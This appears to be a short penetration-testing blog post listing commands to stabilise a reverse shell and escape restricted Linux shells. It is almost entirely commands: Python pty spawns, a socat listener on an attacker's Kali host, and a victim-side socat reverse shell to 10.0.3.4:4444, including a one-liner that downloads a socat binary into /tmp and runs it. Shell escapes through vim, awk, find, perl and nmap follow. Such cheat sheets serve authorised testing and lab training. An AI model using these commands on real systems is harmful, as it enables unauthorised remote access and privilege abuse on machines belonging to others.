Table of Contents


Python pty module:

  
python -c 'import pty; pty.spawn("/bin/sh")'

python3 -c 'import pty; pty.spawn("/bin/sh")' 

python3 -c 'import pty; pty.spawn("/bin/bash")'

Using socat:

On Kali (listen):

  
socat file:`tty`,raw,echo=0 tcp-listen:4444

On Victim (launch):

  
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

If not download in Victim:

  
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Other ways:

  
Using python

python -c 'import pty; pty.spawn("/bin/sh")'



Echo

echo 'os.system('/bin/bash')'



sh

/bin/sh -i



bash

/bin/bash -i



Perl

perl -e 'exec "/bin/sh";'



(From within nmap)

!sh

Related Shell Escape Sequences:

Vi / Vim

  
:!bash

:set shell=/bin/bash

:shell

awk

  
awk 'BEGIN {system("/bin/bash")}'

find

  
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;

If you wanna learn more about how to bypass linux restricted shell, following is the link 44592-linux-restricted-shell-bypass-guide.pdf.

Thanks for reading this post, if you like my work you can support by buying me a pizza. πŸ•